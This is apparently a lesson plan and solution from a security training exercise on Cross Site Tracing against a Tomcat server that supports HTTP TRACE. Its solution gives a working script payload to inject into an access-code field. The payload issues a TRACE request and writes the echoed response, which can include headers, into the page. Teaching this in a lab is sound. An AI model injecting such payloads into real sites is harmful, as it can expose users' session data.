Lesson Plan Title: How to Perform Cross Site Tracing (XST) Attacks

 

Concept / Topic To Teach:

It is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.

 

General Goal(s):

Tomcat is configured to support the HTTP TRACE command. Your goal is to perform a Cross Site Tracing (XST) attack.

 

Solution:

 

You need to introduce a cross site trace attack. This can be realized by embedding the following script in the three digit access code.

 

<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>"); document.write(str1);}</script>

 

Figure 1 Lesson 15

 

Solution by Erwin Geirnaert ZION SECURITY